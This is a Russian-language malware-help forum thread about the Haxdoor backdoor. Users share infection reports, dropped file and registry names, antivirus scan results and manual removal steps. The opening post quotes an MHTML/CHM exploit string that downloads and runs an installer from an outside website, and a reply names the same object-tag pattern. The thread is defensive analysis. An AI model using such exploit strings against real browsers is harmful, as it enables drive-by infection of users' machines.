PDA

Просмотр полной версии : BackDoor.Haxdoor устанавливается при просмотре сайтов



Зайцев Олег
13.04.2005, 08:33
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css::/open.exe
CLSID: {11111111-1111-1111-1111-222222222222}

Данная информация передана в лабораторию Касперского и другим вирусологам, но позволяет пролить свет на типовую методику внедрения данного зверя на компьютеры пользователей. Пользователь, которого занесло на указанный ресурс, работал под XP SP1 с включенным Firewall - и это его естественно не спасло. В ходе лечения на ПК изловлен типовой набор файлов, в частности:
open.exe - это инсталлятор "зверя", размер 44177 байт
wd.sys - 4096 байт
vdnt32.sys - 14832 байт
memlow.sys - 4096 байт
hm.sys - 14832 байт
draw32.dll - 33568 байт
cm.dll - 33568 байт
Как и известные разновидности, данная применяет руткит-механизмы, основанные на перехвате функций в User и Kernel режиме.
Администрации сайта techlabs.ru я отписал письмо с описанием того, что их сайт применяется как источник зверя ....

userr
13.04.2005, 12:52
Сегодня на одном из ПК я изловил свежайшую разновидность Backdoor.Haxdoor. Оказалось, что троянская программа размещена в ресурсе:
хттп://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css
причем style.css является не стилем, как следует из расширения, а CHM архивом, содержащим инсталлятор указанного Backdoor. Инсталляция происходит при помощи кода:
CodeBase: ms-its:mhtml:file://d:\foo.mht!http://techlabs.ru/forum/templates/subSilver/images/lang_russian/ie//style.css::/open.exe
CLSID: {11111111-1111-1111-1111-222222222222}
...

А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?

Зайцев Олег
13.04.2005, 13:02
А можно пояснить, как происходит заражение? В некотором htm есть ссылка на style.css, IE начинает автоматически "исполнять" style.css, несмотря на то, что это chm? А другие броузеры как себя поведут?

Да, примерно так ... вообще методик известно великое множество, наиболее распространенные относятся к категории Exploit.HTML.mht - в теле страницы встречается характерный код типа ... <object data="ms-its:mhtml:file: ... - при его исполнении происходит загрузка и выполнение вредоносного кода. В данном случае применена именно такая технология в типовой реализации - когда "зверь" хранится в CHM файле, причем имя и расширение файла не играют особого значения. Есть и другие варианты - с применением апплетов, JPEG картинок с модифицированным заголовком ...
Причем что интересно - я утром отправил создателям сайта techlabs.ru письмо с описанием ситуации - между тем вредоносный файл по прежнему на месте.

Geser
13.04.2005, 13:44
Может они так зарабатывают :)

Участковый
13.04.2005, 17:27
Это только на IE работает?

Shu_b
13.04.2005, 18:54
Ради интереса переодически кидаю его на вирусскан...

на 15-16 msk:
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

на 19:45 msk:
Dr.Web ***Found Trojan.PWS.LDPinch.394
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

Зайцев Олег
13.04.2005, 19:11
Это только на IE работает?

Судя пл всему да. Я не проверял на других браузерах, но подобные эксплоиты характерны в основном для IE.

Posted by: shu_b
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере

Shu_b
14.04.2005, 21:29
на 14.04.05 22:20 msk

Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

Зайцев Олег
14.04.2005, 22:13
на 14.04.05 22:20 msk

Dr.Web ***Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus ***Found Trojan-Dropper.Win32.Small.ta
NOD32 ***Found probably unknown NewHeur_PE (probable variant)
VBA32 ***Found Trojan.LdPinch.4 (probable variant)

Сегодня вечером я получил ответ от ЛК - все компоненты "зверя" классифицировали как и предполагалось - Backdoor.Haxdoor.cr. От создателей сайта http://techlabs.ru ответ так и не пришел, но сегодня я качнул файлик style.css- уже "Ошибка 404"... - файл вроде как убрали

Shu_b
15.04.2005, 19:10
Последний раз на 15.04.05 20:00 msk:

BitDefender ***Found BehavesLike:Trojan.FirewallBypass (probable variant)
Dr.Web Found Trojan.PWS.LDPinch.394
Kaspersky Anti-Virus Found Trojan-Dropper.Win32.Small.ta
NOD32 Found probably unknown NewHeur_PE (probable variant)
VBA32 Found Trojan.LdPinch.4 (probable variant)

serge
16.04.2005, 14:34
Только интересно, почему DrWEB его запихали в разновидность LDPinch - по виду классический haxdoor, он весьма похож на разновидности ba и an, только чуть побольше в размере

Наверное нашему эвристику поверили ;D

Sanja
16.04.2005, 21:32
хотя он и ошибся.... это ведь не пинчь... тогдаб уж назвали PSW-Trojan

gara77
21.05.2005, 15:36
хочу с вами познакомиться...

Geser
21.05.2005, 16:05
Со всеми сразу, или по очереди?:)

Sanja
22.05.2005, 01:24
:))))

Гость
26.05.2005, 14:11
>[QUOTE=Зайцев Олег]Сегодня на одном из ПК я изловил свежайшую >разновидность Backdoor.Haxdoor.

Это уже не свежая разновидность
хотя алгоритм тот же
Поймал у себя Haxdoor.cn версию этой заразы AVP не мог убить
файлы убиватьв Safe mode:

mszx32.exe - наверное теперь вместо open.exe

- cz.dll
- drct16.dll
- hz.sys
- vdmt16.sys
- winlow.sys
- wz.sys

лежит вся прелесть в system32
Кстати после изоляции вышеперечисленных файлов из родной папочки
каспер их стал видеть.

ну и в реестре ищите ссылки на winlow; vdmt16 и drct16

файлы перечисленные Олегом нифига не найдены, зато есть ключики в реестре (маскировка???) которые выносятся очень легко и просто.
Зато с ключами про winlow; vdmt16 придется попотеть.

Если создатель сего творения это прочитает, то пусть знает ОН ГАД КАКИХ МАЛО!!!!

Dr. Zorg
10.06.2005, 22:26
А я то думал, шо опять комп бочит! Ведь тока систему переустановил! Сначала я воевал с Bloodhound.w32.ep, теперь Нортон обновив, напоролся на Backdoor.Haxdoor. Полный идиотизм - я что, приманка для троянов?!! Короче - кончайте все вирусы, беспощадно!

pig
09.08.2005, 16:08
Спасибо за ценное описание (Гостю отдельно). Очень помогло.

HATTIFNATTOR
23.08.2005, 14:49
Перемещено в "Помогите" -
http://www.virusinfo.info/showthread.php?t=3281

Antivirus_KZ
24.11.2005, 13:08
Седня клиенты жаловались что у них в системе вирусня
Симантек 10.0 молчит как партизан (обновление 09.11.05)
Просканил систему с помощью AVZ 4.1

Лог скана не сохранил к сожалению....
Но AVZ сразу начал ругатся типа
обнаружена маскировка процесса explorer.exe и winlogon.exe
посморел через диспетчер процессов какие библиотеки использует
увидев такие подозрительные как
tcpQ32.dll - не есть гууд.
Заодно она прписалась в HKLM_SOFTWARE_Micrososft_WINNT_Winlogon
и оттудова никак не убирается....в Safe Mode тоже самое
Пришлось грузится с ERD и ручками рубить на корню в реестре
а заодно в System32...
После этого загрузился нормально и запустил скан Симантека
Мля скокоже он гадости надыбал
Backdoor.haxdor.E
Вопрос почему до этого молчал?? Ведь же вирус не такой новый..
Приходилось сталкиватся, до этого Backdoor.haxdor.C

Antivirus_KZ
24.11.2005, 13:26
В поддержке симантека посморел по запросу Backdoor.Haxdoor.E
результат http://securityresponse.symantec.com/avcenter/venc/data/backdoor.haxdoor.e.html

Мля.. как сказал Гость... Автор гад каких мало!!!>:(

MOCT
24.11.2005, 13:38
Симантек 10.0 молчит как партизан (обновление 09.11.05)

семантек не очень надежный - он в местной рейтинге стоит на последнем месте.

пришлите логи сканирования AVZ и HJT (по правилам форума), возможно что-то осталось неисправленным.

если найденные зараженные файлы и tcpQ32.dll сохранились - пришлите пожалуйста на исследование.

Antivirus_KZ
24.11.2005, 14:10
Согласен Симантек не надежен особенно 9 и 8 версии...
Ну ничего не поделать... политика партии....
К сожалению ступил с самого начала....
файлы не сохранил...и лог тоже :'-(

Зато копаясь в недрах реестра обнаружил
что дрянь tcpQ32.dll и tcpQ64.sys
прописались еще в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\SafeBoot\Minimal
а также HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\SafeBoot\Network

MOCT
24.11.2005, 20:23
Зато копаясь в недрах реестра обнаружил
что дрянь tcpQ32.dll и tcpQ64.sys

пришлите пожалуйста эти файлы на исследование.

Гость
07.12.2005, 22:57
tcpq32.dll - Жуткая вещь. Данный вирус, мало того что не видит ни один антивирус, этот файл прячется так, что - ни впроцессах, ни в директории system32 (где он благополучно обитает) его нет.
Нашел эту гадость с помощью Hexprobe, глубоко-глубоко в процессах.

Что оно делает.

1. Выводит из строя ваш файервол. В моем случае Zone Alarm. Берет на себя службу TrueVector. Так-же блокирует несколько других служб, что оголяет ваш компьютер даже для школьника.
2. Блокирует запуск некоторых приложений. Например WinAmp, вырубает сразу просле загрузки.
3. Запрещает запуск некоторых антивирусов. В моем случае, даже не запускалась установка McAfee.
4. В I.E., пропадает основное меню (файл - правка - вид ...), А так-же, меню пользователя и избранное.
5. Самое жуткое. После входа в сеть, примерно минут через 5 (в зависимости от активности удаленного сервера хакера), происходит критическая ошибка памяти, что тут-же приводит к синему "экрану смерти" - Stop: c000021a {Fatal System Error} ...

Удалить эту заразу можно только через консоль восстановления, в ручную. Для этого нужно загрузится с утановочного диска и зайти в режим Repair (Восстановление). Перейти в каталог System32 (cd \windows\system32) и удалить tcpq32.dll (delete tcpq32.dll).

Вот такая вот кака. ((((

Гость
07.12.2005, 23:05
В догонку...

Мое подозрение, что это новый backdor.nthack, т.к. именно он вызывал фатал еррор. Хотя джины (newgina) нет нифига в реестре.

P.S. После удаления Dll-шника, проверьте систему несколько раз, возможно он еще натащил кучу троянов. Мое мнение, вирус достаточно опасен. Будьте бдительны.

azza
08.12.2005, 14:36
В догонку...
Мое подозрение, что это новый backdor.nthack...

This is a report processed by VirusTotal on 12/08/2005 at 12:34:14 (CET) after scanning the file "Tcpq32.dll" file.
Antivirus Version Update Result

AntiVir 6.33.0.61 12.08.2005 no virus found
Avast 4.6.695.0 12.07.2005 no virus found
AVG 718 12.05.2005 no virus found
Avira 6.33.0.61 12.08.2005 no virus found
BitDefender 7.2 12.08.2005 Backdoor.Haxdoor.FD
CAT-QuickHeal 8.00 12.08.2005 no virus found
ClamAV devel-20051108 12.07.2005 no virus found
DrWeb 4.33 12.08.2005 BackDoor.Haxdoor.173
eTrust-Iris 7.1.194.0 12.07.2005 Win32/Haxdoor.Variant!HookDLL!Tr
eTrust-Vet 11.9.1.0 12.08.2005 no virus found
Fortinet 2.54.0.0 12.08.2005 suspicious
F-Prot 3.16c 12.07.2005 no virus found
Ikarus 0.2.59.0 12.08.2005 no virus found
Kaspersky 4.0.2.24 12.08.2005 Backdoor.Win32.Haxdoor.fd
McAfee 4645 12.07.2005 BackDoor-BAC.dll
NOD32v2 1.1315 12.07.2005 a variant of Win32/Haxdoor
Norman 5.70.10 12.08.2005 no virus found
Panda 8.02.00 12.07.2005 Bck/Haxdoor.FA
Sophos 4.00.0 12.08.2005 Troj/Haxdor-Fam
Symantec 8.0 12.07.2005 no virus found
TheHacker 5.9.1.051 12.08.2005 no virus found
VBA32 3.10.5 12.08.2005 suspected of Trojan-Spy.Banker.71

Гость
08.12.2005, 15:57
У меня Dr.Web 4.33 вообще ничего не увидел. Видимо, это из-за скрытия (или какой-либо защиты от антивирей) происходило.

Почему-же тогда у меня система вылетала при коннекте с сетью? Ведь в описании вирусов семейства BackDoor.Haxdoor, такого глюка не наблюдалось. Или все-же бывает? В нете, по крайней мере, по этому поводу ничего не нашел.

Leonid
10.12.2005, 13:51
Привет!
Впервые попробовал вот твою программу.
Классная. Работает быстро и качественно, интерфейс приятный.
Попробовал просто так, но когда узрел результат (см. аттач) то стало не по себе. Непонятно, почему Касперский и ВЭБ пропускают, когда там столько нечисти, неужто нельзя было встроить модулем в них твою прогу?
У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...
Еще раз спасибо!
Леонид.
mailto:leo_mlp@rambler.ru (leo_mlp@rambler.ru)

Geser
10.12.2005, 14:03
Привет!
Впервые попробовал вот твою программу.
Классная. Работает быстро и качественно, интерфейс приятный.
Попробовал просто так, но когда узрел результат (см. аттач) то стало не по себе. Непонятно, почему Касперский и ВЭБ пропускают, когда там столько нечисти, неужто нельзя было встроить модулем в них твою прогу?
У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...
Еще раз спасибо!
Леонид.
mailto:leo_mlp@rambler.ru (leo_mlp@rambler.ru)
Гатор понятно, распространённая адварь. Касперу нужно расширенные базы поставить, скорее всего увидит. Остальные подозрения возможно ложняки. Нужно прислать на анализ файлы.

MOCT
10.12.2005, 18:58
У меня просьба: глянь что на самом деле там такой страх что хоть ящик выбрасывай ? Я никогда раньше с этим не сталкивался: Касперский или ВЭБ отработал, вычистил и на этом все, а тут столько всего...

файлы
c:\program files\common files\gmt\egieprocess.dll
c:\Program Files\Common Files\GMT\EGIEProcess.dll
c:\Program Files\Teamspeak2_RC2\KeyPress.dll
рекомендуется прислать на анализ на virus@virusinfo.info с паролем virus для анализа и добавления в базу.
остальные детектируемые файлы можно смело удалять - это шпионские модули.

Комикс
25.05.2006, 07:47
Я уже назнаю что делать... у меня стоит Symantec Corporate Editor 9.0
при проверке он нашел:
can type: Realtime Protection Scan
Event: Virus Found!
Virus name: Backdoor.Haxdoor
File: C:\WINDOWS\system32\sertgs.dll
Location: C:\WINDOWS\system32
Computer: 15-1
User: alia
Action taken: Clean failed : Quarantine failed : Access denied
посморел по сенмантику... он мне выдал несколько разновидностей этого вируса, но ни один из предложеных методов не помог... подскажите что делать???
у меня честно говоря осталдось тока однамысля... снести всю систему и поставить заного...

MOCT
25.05.2006, 08:09
посморел по сенмантику... он мне выдал несколько разновидностей этого вируса, но ни один из предложеных методов не помог... подскажите что делать???
у меня честно говоря осталдось тока однамысля... снести всю систему и поставить заного...
http://helpme.virusinfo.info

Xen
25.05.2006, 09:24
Попробуй просканировать систему утилитой XenAntiSpyware (можно взять с http://xen.name) и выложить сюда логи. Если у тебя засел только юзермодный руткит, должно помочь.

Alexey P.
25.05.2006, 17:11
Или провериться из безопасного режима CureIt-ом. В Правилах (см. http://helpme.virusinfo.info ) это написано, там же ссылка.

XL
06.07.2006, 16:37
Сегодня третий раз довелось встретиться с haxdoor.ja и первый раз его удалось завалить без осложнений в режиме пользователя. Помог avenger (отдельное спасибо RIC), autoruns для отслеживания драйверов и DLL'ок, AVZ для выявления перехватов. Вообщем эта мразь запускает пару драйверов(судя по названию для 32-х битной и 64-х битной ОС), одну DLL'ку с ключом в winlogon и маскирует процесс в памяти с произвольным именем. Плюс ко всему восстанавливает свои перехваты почти сразу же после их нейтрализации через AVZ. AVZ guard не помогает. В сэйф моде user mode rootkit также живет и процветает.

Как удалял: сначала через avenger вынес драйверы и dll'ку. Самое интересное, что после этого перехваты и маскировки все еще фиксировались даже после перезагрузки, хотя файлы вроде как исчезли из автозапуска и avz их уже не находил. Поставил NOD32 и только после этого перехваты исчезли, хотя NOD в памяти так ничего и не выцедил. Мистика...

И еще удивляет однообразие видового состава найденного зверья. Такое ощущение, что все загружается одним и тем же трояном.

celeron
01.08.2006, 16:43
В поддержке симантека посморел по запросу Backdoor.Haxdoor.E
результат http://securityresponse.symantec.com...haxdoor.e.html

Мля.. как сказал Гость... Автор гад каких мало!!!
Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.

_HEKTO_
01.08.2006, 18:35
Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.

Угу. А я знаком с парой профессиональных карманников - милейшие люди.

Думаем прежде чем говорить или как?

MedvedD
02.08.2006, 09:18
Ну сейчас начнётся война..

pig
02.08.2006, 11:01
ЦЫтата:
"<Имярек, известный бард> - конечно, гад, но гений" (c) Ваня Густов
Имя барда censored во избежание. Тем более, что близкого знакомства я с ним не имел.

Sanja
02.08.2006, 20:44
Зря ты так.. Я знаком с автором этого троя (не в реале). Наш соотечественник, профессионал высокого уровня. Ты вобще представляешь, что значит писать Kernel Mode rootkit, User Mode rootkit? Когда одна часть работает в драйвере на нулевом кольце, вторая в dll в User Mode, через спец интерфейс взаимодействуя с первой.. Перехват Native API, вобщем вещь на уровне.. Просто каждый зарабатывает по своему.. Не суди и не судим будешь.
Не самый сложный троян бекдор если честно Ж)
И дривер кривоват )) Бсодит частенько Ж)

celeron
03.08.2006, 10:40
И дривер кривоват )) Бсодит частенько Ж)
Ну не знаю, у меня не разу не бсодил )))

celeron
04.08.2006, 05:00
В тему
http://www.securitylab.ru/news/271471.php
)))

Sanja
04.08.2006, 17:43
Ток ненадо тут рекламировать А311 плиз Ж)

MOCT
07.08.2006, 21:23
статья A311Death inside из зина FH0 :
http://damagelab.org/index.php?act=Attach&type=post&id=1120

Valeryi
23.09.2006, 23:37
Сайт,
который уже долгое время, пытается “засылать” на компьютер,
через Internet Explorer,
различные вирусно-шпионские программы.
Притом, примерно раз в неделю, он их, меняет.
Сайт: <http://www.w###ader.ru>
Сегодня, подгружает трояна, VMLFill,
сайт: <http://wwwf###lancers.com/l00p.html>